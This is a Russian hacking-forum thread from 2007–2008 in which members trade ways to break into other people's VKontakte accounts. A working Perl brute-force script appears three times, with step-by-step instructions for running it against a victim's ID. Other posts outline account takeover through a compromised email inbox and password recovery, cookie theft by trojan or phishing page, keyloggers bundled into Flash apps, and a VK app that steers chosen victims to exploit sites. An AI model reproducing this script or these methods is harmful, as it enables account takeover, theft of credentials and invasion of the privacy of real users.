Форумы  Правила форума  Сегодняшние посты 
Зарегистрироваться  Вход  Мой профиль  Входящие  Адресная книга  Моя подписка  Мои форумы  Выход
Текстовая версия  Список пользователей  Карта  Top-100 пользователей  Календари  Ticket List  Фото галерея
ПОИСК  FAQ 
RSS:  20 последних сообщений форума 20 последних топиков форума

VKONTAKTE.RU: ищем уязвимости, делимся опытом

 
Посмотреть связанные обсуждения: (в этом форуме | во всех форумах)

Зашли как: Guest
Пользователи, просматривающие топик: none
  Версия для печати
Все форумы >> [Взлом] >> В Сети >> VKONTAKTE.RU: ищем уязвимости, делимся опытом Страниц: [1] 2 3 4 5   след >   >>
Имя
Сообщение << Старые топики   Новые топики >>
VKONTAKTE.RU: ищем уязвимости, делимся опытом - 31.07.2007 2:42:59  1 голосов
voody


Сообщений: 961
Оценки: 0
Присоединился: 06.02.2005
Откуда: Санкт-Петербург
Статус: offline
Сайт vkontakte.ru на данный момент является чуть ли не самым известным сайтом для общения студентов и школьников. Я зарегистрировался на нем пару месяцев назад и нашел там почти всех своих бывших одноклассников и просто людей, с которыми я раньше общался, но потом по каким-то причинам потерял с ними связь.

Я знаю, что где-то пол года назад (на том же сайте, в какой-то группе о ней было написано) там была уязвимость, которая позволяла любому человеку, знающему ID пользователя, зайти в его аккаунт. Нужно было подправить в кукисах параметры remixid и remixemail на те, что были у пользователя и все, аккаунт твой. Но сейчас туда ввели еще и remixpass - хэш пароля. После этого, использовать уязвимость не представлялось возможным. Нет, был случай, когда я дал одному человеку троян, украл кукисы с винча и подставил значения, но это был взлом компьютера пользователя, а не сайта.

Зачем я все это пишу: я предлагаю вместе искать уязвимости на этом сайте и выкладывать свои результаты сюда. Не обязательно пытаться ломать весь сайт. Во-первых, это сложно и занимает много времени. Во-вторых, если кто его и сломает - вряд ли поделиться информацией о том, как он это сделал (хотя, х.з., бывают и добрые люди). Я сейчас говорю, допустим, об XSS, или, о чем-нибудь в этом роде. Пишите сюда, кто заинтересован. Можно сайт вместе поковырять. Я думаю, что эта тема будет интересна достаточно большому кругу людей.


Post #: 1
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 31.07.2007 18:17:13   
cataha01

Сообщений: 122
Оценки: 0
Присоединился: 12.03.2006
Статус: offline
на чот тут есть хз http://forum.antichat.ru/thread45578.html

(в ответ на voody)
Post #: 2
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 31.07.2007 23:58:25   
voody


Сообщений: 961
Оценки: 0
Присоединился: 06.02.2005
Откуда: Санкт-Петербург
Статус: offline
Спасибо за ссылку, интересно. Проверил, работает ли метод с заменой e-mail'а на произвольный, оказалось, что да. Заменил свой e-mail в куках, перезагрузил страницу - я до сих пор был в своем аккаунте. С одной этой уязвимостью аккаунт, конечно, не вскроешь, но то, что не нужно узнавать адрес ящика, а нужен только пароль, уже радует. С флудером (тем, что в конце описан, с первым все более-менее ясно) пока не разбирался. Я Perl'а не знаю, было бы на PHP ... Вообщем, кто-то откликнулся, уже хорошо.

Народ, еще мысли есть? Может, кто XSS'ку найдет? Я, пока, что, их не видел, может, плохо искал.

(в ответ на cataha01)
Post #: 3
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 01.08.2007 1:14:58   
nutsbutters

Сообщений: 6
Оценки: 0
Присоединился: 31.07.2007
Статус: offline
в контатке кстати есть группа, по поиску уязвимостей в проекте

кажется <sсriрt>alert('xak')</sсriрt> или как то так называется :)

(в ответ на voody)
Post #: 4
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 01.08.2007 20:39:19   
asylum


Сообщений: 430
Оценки: 0
Присоединился: 30.05.2006
Откуда: Палата № 6
Статус: offline
И вроде как на этом движке, на этой неделе дыру нашли

(в ответ на nutsbutters)
Post #: 5
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 13.01.2008 7:36:07   
voody


Сообщений: 961
Оценки: 0
Присоединился: 06.02.2005
Откуда: Санкт-Петербург
Статус: offline
Поднимаю тему. Может, кто-нибудь что-то новое нашел. Я пока ничего найти не могу.

(в ответ на asylum)
Post #: 6
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 04.06.2008 2:19:45   
Flight

Сообщений: 10
Оценки: 0
Присоединился: 06.01.2008
Откуда: Г.Воркута
Статус: offline
http://q-zar.livejournal.com/151187.html
Вот заходите почитайте статейку!! наверное всем будет интересна!!!

(в ответ на voody)
Post #: 7
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 04.06.2008 2:38:55   
Flight

Сообщений: 10
Оценки: 0
Присоединился: 06.01.2008
Откуда: Г.Воркута
Статус: offline
[link=http://obrute.info/site/vkontakteru-brut-final/#]view plain[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]copy to clipboard[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]print[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]?[/link]#!/usr/bin/perl    use IO::Socket;  use MD5;  use threads;  use threads::shared;  my @pass : shared;    ######################################  # C!klodoL  # vkontakte.ru bruteforce with multi-threads  ######################################  $dic = 'passl.txt';  #словарь паролей  $id = 111111;  #id цели  $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40  $threads = 4;  #количество потоков  ######################################    open (pass, "<$dic");    next:  @pass ="" pass();    for(0..$threads) {$trl[$_] ="" threads->create(\&Brut, $_);}  for(@trl) { $_->join; }    sub Brut  {    while (@pass){    $pass = shift @pass;    $md5 = MD5->hexhash($pass);  $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);  print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".  "Host: vkontakte.ru\r\n".  "Accept: */*\r\n".  "Content-Type: application/x-www-form-urlencoded\r\n".  "User-Agent: Mozillo\r\n".  "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".  "Connection: close\r\n\r\n";  $answ = <$sock>;  close $sock;  print "$pass  $answ";  if ($answ =~ /302/){  open (good, '>>good.txt');  print good "$id:$pass:$md5\n";  print "$id:$pass:$md5\n";  close good;  exit;}  }    }    goto Next;    sub pass  {  my (@mas);  while (<pass>){  push @mas, $_;  last if (@mas == 400);  }  chomp @mas;  return @mas;  } 

$dic = ‘passl.txt’; #словарь паролей
$id = 111111; #id цели
$mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
для начала:
1. тебе нужна прога ActivePerl 5.10.0.1001 я юзаю её.
2. потом из первого поста копируешь себе текст в текстовый файл… и меняешь id жертвы на нужное тебе.
3. переименуй файл из primer.txt в primer.pl
4. туда где лежит этот файл, скопируй файл со словарём, в данном примере это passl.txt
5. запускай файл, и радуйся…
6. создастся good.txt, где и будет твой пасс.

http://www.softportal.com/get-70-activeperl.html ------ ActivePerl 5.10.0.1001
Я это брал с какогото сайта уже не помню но отзывы были 100%!!!!
Всем удачи!!!

(в ответ на Flight)
Post #: 8
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 04.06.2008 2:41:04   
Flight

Сообщений: 10
Оценки: 0
Присоединился: 06.01.2008
Откуда: Г.Воркута
Статус: offline
Чёт оно криво вставилось!!! Если кто хочет получить стучите в асю 356-811-887!! Дам подробную инфу!!

(в ответ на Flight)
Post #: 9
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 05.06.2008 14:03:28   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
Есть способ, он только для каждого пользователя отдельно, достаточно лишь знать  мыло жертвы, "в контакте" есть функция восстановления пароля(как и на всех сайтах такого рода) но дело в том что система не выдаёт нам новый пароль, а она присылает старый. Кто не понял в чём фишка, пишу дальше... Нам нужно взломать мыло жертвы(каждый наверняка знает какой прогой это можно сделать) сломали мыло, заходим в почту(новые письма не читаем, а то пропалят) заходим "в контакт" вбиваем взломанное мыло, и восстанавливаем пароль на это мыло, получаем письмецо, быстренько списываем полученные данные, удаляем письмо, выходим. Вот и всё. Этот способ больше подходит для тех кто хочет кому то отомстить

(в ответ на Flight)
Post #: 10
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 05.06.2008 15:42:19   
Jarull


Сообщений: 360
Оценки: 0
Присоединился: 04.04.2007
Откуда: Встречайте прямо из Москвы
Статус: offline
мдаааа идея со взломом мыла меня ваще поразила......ну попробуй взломай мыльцо........
кстати то что дано на античате канешно класс но много чего уже прикрыли.......

(в ответ на _~eXe~_)
Post #: 11
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 06.06.2008 17:14:53   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
Могу выложить для всего этого проги)))ну эт если не найдёте...))) а так вот сайтец с отличным софтом для любого взлома   http://litaretti.ucoz.ru

(в ответ на Jarull)
Post #: 12
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 06.06.2008 18:02:28   
[ TRaY ]


Сообщений: 931
Оценки: 4
Присоединился: 22.03.2008
Откуда: бомж
Статус: offline
quote:

ORIGINAL: Flight

[link=http://obrute.info/site/vkontakteru-brut-final/#]view plain[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]copy to clipboard[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]print[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]?[/link]#!/usr/bin/perl    use IO::Socket;  use MD5;  use threads;  use threads::shared;  my @pass : shared;    ######################################  # C!klodoL  # vkontakte.ru bruteforce with multi-threads  ######################################  $dic = 'passl.txt';  #словарь паролей  $id = 111111;  #id цели  $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40  $threads = 4;  #количество потоков  ######################################    open (pass, "<$dic");    next:  @pass ="" pass();    for(0..$threads) {$trl[$_] ="" threads->create(\&Brut, $_);}  for(@trl) { $_->join; }    sub Brut  {    while (@pass){    $pass = shift @pass;    $md5 = MD5->hexhash($pass);  $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);  print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".  "Host: vkontakte.ru\r\n".  "Accept: */*\r\n".  "Content-Type: application/x-www-form-urlencoded\r\n".  "User-Agent: Mozillo\r\n".  "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".  "Connection: close\r\n\r\n";  $answ = <$sock>;  close $sock;  print "$pass  $answ";  if ($answ =~ /302/){  open (good, '>>good.txt');  print good "$id:$pass:$md5\n";  print "$id:$pass:$md5\n";  close good;  exit;}  }    }    goto Next;    sub pass  {  my (@mas);  while (<pass>){  push @mas, $_;  last if (@mas == 400);  }  chomp @mas;  return @mas;  } 

$dic = ‘passl.txt’; #словарь паролей
$id = 111111; #id цели
$mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
для начала:
1. тебе нужна прога ActivePerl 5.10.0.1001 я юзаю её.
2. потом из первого поста копируешь себе текст в текстовый файл… и меняешь id жертвы на нужное тебе.
3. переименуй файл из primer.txt в primer.pl
4. туда где лежит этот файл, скопируй файл со словарём, в данном примере это passl.txt
5. запускай файл, и радуйся…
6. создастся good.txt, где и будет твой пасс.

http://www.softportal.com/get-70-activeperl.html ------ ActivePerl 5.10.0.1001
Я это брал с какогото сайта уже не помню но отзывы были 100%!!!!
Всем удачи!!!

Баян, на форуме не первый раз постится, и мог бы если уж на то пошло, норм выложить, а не кракозяблины...

quote:

ORIGINAL: _~eXe~_

Могу выложить для всего этого проги)))ну эт если не найдёте...))) а так вот сайтец с отличным софтом для любого взлома   http://litaretti.ucoz.ru

ыы) реклама=бан

Зачем вам вообще этот контакт нужен? тупо посмотреть закрытые фотки и видео? ну получите базу мыл примерно в 15млн, из которых 75-80% валид((
На самом деле, контакт никакой особо ценной инфы не содержит... тем более соц сети разрушают мозг...

(в ответ на _~eXe~_)
Post #: 13
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 07.06.2008 1:40:50   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
Енто не реклама))))xD)) это просто ссылка)))), и я думаю первый раз обойдёмся предупреждением....))) а сайт хорош)))

(в ответ на [ TRaY ])
Post #: 14
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 07.06.2008 2:25:48   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
У меня есть такой банальный вопрос: как можно обойти вот эту защиту???? 
Ошибка

Страница скрыта

Пользователь предпочел скрыть эту страницу.

Назад

Кто хоть примеоно знает, плиз, отпишитесь!
P.S Заранее спасибо) 

< Сообщение отредактировано _~eXe~_ -- 07.06.2008 2:27:56 >

(в ответ на _~eXe~_)
Post #: 15
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 12.06.2008 18:49:59   
npixel4

Сообщений: 33
Оценки: 0
Присоединился: 08.06.2008
Статус: offline
ну лично как я узнавал...то никак...всё ухе прикрыли(((

(в ответ на _~eXe~_)
Post #: 16
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 13.06.2008 22:20:24   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
Ну вообще то я уже нашел прогу с помощью  которой можно смотреть всё кроме "стены" в контакте не добавляясь в друзья.
P.S Прога называется VRazvedke, вот ссыла на скачивание : http://www.rapidshare.ru/702461
(Если у кого возникнут вопросы по пользованию прогой, пишите в личку)

< Сообщение отредактировано _~eXe~_ -- 13.06.2008 22:22:23 >

(в ответ на npixel4)
Post #: 17
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 13.06.2008 22:26:44   
Chrek625

Сообщений: 192
Оценки: 0
Присоединился: 09.01.2008
Статус: offline
quote:

ORIGINAL: _~eXe~_

Ну вообще то я уже нашел прогу с помощью  которой можно смотреть всё кроме "стены" в контакте не добавляясь в друзья.
P.S Прога называется VRazvedke, вот ссыла на скачивание : http://www.rapidshare.ru/702461
(Если у кого возникнут вопросы по пользованию прогой, пишите в личку)

Слушай что то подозрительно а не склеяна ли программа с каким то вирусом?

(в ответ на _~eXe~_)
Post #: 18
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 14.06.2008 0:03:15  1 голосов
Jarull


Сообщений: 360
Оценки: 0
Присоединился: 04.04.2007
Откуда: Встречайте прямо из Москвы
Статус: offline
Ну вот возьми и проверь, поставь на виртуальную машину и снифером чекай, если идут куда пакеты значит трой, а если постараешься то узнаешь и куда эти отчеты летят.......

(в ответ на Chrek625)
Post #: 19
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 14.06.2008 0:05:07   
maiel

Сообщений: 64
Оценки: 0
Присоединился: 15.12.2006
Откуда: БАТУМИ
Статус: offline
Зачем вредить народу??

(в ответ на Jarull)
Post #: 20
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 14.06.2008 0:31:02   
Chrek625

Сообщений: 192
Оценки: 0
Присоединился: 09.01.2008
Статус: offline
quote:

ORIGINAL: Jarull

Ну вот возьми и проверь, поставь на виртуальную машину и снифером чекай, если идут куда пакеты значит трой, а если постараешься то узнаешь и куда эти отчеты летят.......

Да нууу нафиг а я то думал что да как мне сделать я высказал своё мнение а не мпрашивал...

(в ответ на maiel)
Post #: 21
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 16.06.2008 0:12:54   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
quote:

ORIGINAL: Chrek625

quote:

ORIGINAL: _~eXe~_

Ну вообще то я уже нашел прогу с помощью  которой можно смотреть всё кроме "стены" в контакте не добавляясь в друзья.
P.S Прога называется VRazvedke, вот ссыла на скачивание : http://www.rapidshare.ru/702461
(Если у кого возникнут вопросы по пользованию прогой, пишите в личку)

Слушай что то подозрительно а не склеяна ли программа с каким то вирусом?

Слушай!!! У тя чё башню снесло какой нафиг вирус!!! Наоборот выкладываешь хорошие вещи, а тут сразу выпендрос! Подозрительно!!!-НЕ КАЧАЙ, сиди и смотри как другие пользуются!!! А если бы он и был там! Руки что ли не там растут? Вирус удалить не сможешь?
Ну и народ пошел...

(в ответ на Chrek625)
Post #: 22
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 19.06.2008 22:38:58   
Zzzen

Сообщений: 6
Оценки: 0
Присоединился: 10.03.2008
Статус: offline
Скрипт работает просто, используется простой bruteforce (перебор вариантов), в этом скрипте перебор паролей, которые расположены в файле. Человек с руками может сделать из этого скрипта более модифицированный вариант.

Так, что ловите.


#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (
){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}

Источник - форум Античата.ру

(в ответ на _~eXe~_)
Post #: 23
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 21.06.2008 15:30:25  1 голосов
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
Скриптик не плохой, но ты сам подумай процент попадания, и тя с этим скриптом в бан лист сразу, ты не первый кто такую версию выкладывает, "в контакте" тоже не дураки сидят, и тем более брут-эт долго

(в ответ на Zzzen)
Post #: 24
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 21.06.2008 16:16:36   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
Вроде по взлому этой сети уже всё сказано, хотя осталься последний способ, это MD5. На их сервере идёт шиврование пароля мд5 которое прописано в куках, хорошо что уже нашлись люди которые могут взломать эту систему шифрования, на нашем сайте много о нём сказано, юзайте поиск.
P.S Если кто хочет подробное описание дейсвий взлома и ссылок, пищите.

(в ответ на _~eXe~_)
Post #: 25
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 21.06.2008 17:38:02   
[ TRaY ]


Сообщений: 931
Оценки: 4
Присоединился: 22.03.2008
Откуда: бомж
Статус: offline
quote:

ORIGINAL: _~eXe~_

Вроде по взлому этой сети уже всё сказано, хотя осталься последний способ, это MD5. На их сервере идёт шиврование пароля мд5 которое прописано в куках, хорошо что уже нашлись люди которые могут взломать эту систему шифрования, на нашем сайте много о нём сказано, юзайте поиск.
P.S Если кто хочет подробное описание дейсвий взлома и ссылок, пищите.

Куки еще украсть нужно... А разве есть хсс на сайте вконтакте? О_о
Или каким способом предполагается похищать куки?

(в ответ на _~eXe~_)
Post #: 26
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 22.06.2008 1:41:12   
TurboXaker

 

Сообщений: 385
Оценки: 0
Присоединился: 23.05.2008
Статус: offline
quote:

Или каким способом предполагается похищать куки?

http://www.viruslist.com/ru/weblog?discuss=207758696&return=1
в аналогичной статье было написано что вирус похищает куки => для похищения кук надо написать трой

< Сообщение отредактировано TurboXaker -- 22.06.2008 1:43:44 >


_____________________________

СМС с подделкой номера
Сапе система
Домены .RU за 300руб!

(в ответ на [ TRaY ])
Post #: 27
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 22.06.2008 1:57:32   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
quote:

ORIGINAL: [ TRaY ]

Куки еще украсть нужно... А разве есть хсс на сайте вконтакте? О_о
Или каким способом предполагается похищать куки?


Ну почему сразу хсс, есть же и куча других способов,  XSS в контакте не пашит, можно написать скрипт который будет тащить куку(исходников в инете куча, а там уже сам редакть как хочешь) написать скрипт, создать php страничку, и кинуть жертве в личку или на доску(на доске еще кто нить поймается xD) а еще проще кинуть ссылку на keyloger и нет проблем

(в ответ на [ TRaY ])
Post #: 28
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 22.06.2008 3:49:50   
webserfer2

Сообщений: 56
Оценки: 0
Присоединился: 23.05.2008
Откуда: Мурманск
Статус: offline
Народ, вы бы попробовали использовать Flash и API Vkontakte - я думаю там дырок еще полно...

(в ответ на _~eXe~_)
Post #: 29
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 23.06.2008 2:06:50   
FreeKing

Сообщений: 31
Оценки: 0
Присоединился: 25.11.2007
Статус: offline
Кстати, насчет API - там же, в отличие от простых ссылок на доске никаких "предупреждений о безопасности" не бывает - а прямо может редиректить на любой сайт...
Что если написать простое безобидное приложение, тип прикола красочного или там открытки, в котором отслеживать, кто его смотрит. И если это жертва - редиректить ее на сниффер, сайт с експлоитом etc. - дальше думаю все понятно, а если не жертва - то не выполнять никаких хакерских действий. Так ее не запалят админы контакта - и в то же время жертва попадет куда нам надо - а там уже хоть XSS, хоть что.

(в ответ на webserfer2)
Post #: 30
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 23.06.2008 13:18:25   
Derek_RED


Сообщений: 236
Оценки: 0
Присоединился: 16.03.2008
Откуда: Kazan sity
Статус: offline
http://www.viruslist.com/ru/weblog?discuss=207758696&return=1 и кто это интересно? Вам помочь чем нить ?

(в ответ на FreeKing)
Post #: 31
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 24.06.2008 1:22:36   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
quote:

ORIGINAL: Derek_RED

Вам помочь чем нить ?

Да мы то можем и сами, а вот предложения по поводу взлома не помешают...))) Имеются таковые?

(в ответ на Derek_RED)
Post #: 32
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 24.06.2008 1:29:23   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Статус: offline
quote:

ORIGINAL: webserfer2

Народ, вы бы попробовали использовать Flash и API Vkontakte - я думаю там дырок еще полно...

Да, это тоже хороший вариант, написать безобидный скриптик, склеить его с Flash'ом и проблема решена, можно еще конеш лучше с кейлогером склеить-надёжнее и пасс можно будет узнать)

(в ответ на webserfer2)
Post #: 33
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 24.06.2008 4:02:43   
furiousangel


Сообщений: 1045
Оценки: 40
Присоединился: 28.05.2005
Откуда: /home/furang
Статус: offline
Где-то на ачате я видел линк на PoC XSS на vkontakte. Это flash приложение на VkontakteAPI.

_____________________________


(в ответ на _~eXe~_)
Post #: 34
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 25.06.2008 18:13:23   
JTG


Сообщений: 1198
Оценки: 0
Присоединился: 05.03.2007
Откуда: ‮и онмет тут теапак аклотоп с
Статус: offline
http://vkontakte.ru/apps.php?act=s&id=151392

(в ответ на furiousangel)
Post #: 35
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 26.06.2008 2:39:27   
trevan

Сообщений: 30
Оценки: 0
Присоединился: 29.04.2007
Статус: offline
Через комп мой заходил друг на сайт можно вытащить его пороль из компа если можно то как?

(в ответ на JTG)
Post #: 36
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 26.06.2008 13:37:56  2 голосов
Jarull


Сообщений: 360
Оценки: 0
Присоединился: 04.04.2007
Откуда: Встречайте прямо из Москвы
Статус: offline
quote:

Через комп мой заходил друг на сайт можно вытащить его пороль из компа если можно то как?


Читай форум......обо всем было сказано Биллион раз.....ну а если лень искать то вот те способ....берешь и скачиваешь программу Multi Password Recovery,запускаешь и она выдает тебе все пароли сохраненные на твоем компе.......за то что я сделал всю работу за тебя мож поставить +

(в ответ на trevan)
Post #: 37
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 27.06.2008 2:43:35   
webserfer2

Сообщений: 56
Оценки: 0
Присоединился: 23.05.2008
Откуда: Мурманск
Статус: offline
quote:

ORIGINAL: _~eXe~_
Да, это тоже хороший вариант, написать безобидный скриптик, склеить его с Flash'ом и проблема решена, можно еще конеш лучше с кейлогером склеить-надёжнее и пасс можно будет узнать)

На actionsсriрt реально что-то такое написать?

(в ответ на _~eXe~_)
Post #: 38
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 28.06.2008 18:29:53   
ZAmpol1T

Сообщений: 3
Оценки: 0
Присоединился: 28.06.2008
Статус: offline
quote:

ORIGINAL: _~eXe~_

quote:

ORIGINAL: webserfer2

Народ, вы бы попробовали использовать Flash и API Vkontakte - я думаю там дырок еще полно...

Да, это тоже хороший вариант, написать безобидный скриптик, склеить его с Flash'ом и проблема решена, можно еще конеш лучше с кейлогером склеить-надёжнее и пасс можно будет узнать)


уже давно пофиксили, теперь ядовитый .swf блочится уже на стадии загрузки его на сервер

(в ответ на _~eXe~_)
Post #: 39
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 29.06.2008 1:32:07   
webserfer2

Сообщений: 56
Оценки: 0
Присоединился: 23.05.2008
Откуда: Мурманск
Статус: offline
quote:

ORIGINAL: ZAmpol1T
уже давно пофиксили, теперь ядовитый .swf блочится уже на стадии загрузки его на сервер

А если сделать чтоб он его подгружал в процессе?
Вполне безобидная флешка)

(в ответ на ZAmpol1T)
Post #: 40
Страниц:   [1] 2 3 4 5   след >   >>
Все форумы >> [Взлом] >> В Сети >> VKONTAKTE.RU: ищем уязвимости, делимся опытом Страниц: [1] 2 3 4 5   след >   >>
Перейти к:





Новые сообщения Нет новых сообщений
Популярные с новыми сообщениями Популярные без новых сообщений
Заблокированные с новыми сообщениями Заблокированные без сообщений
 Новое сообщение
 Ответ
 Новое голосование
 Оставить голос
 Удалить мой пост
 Удалить мое обсуждение
 Оценить пост









Rambler's Top100
0.844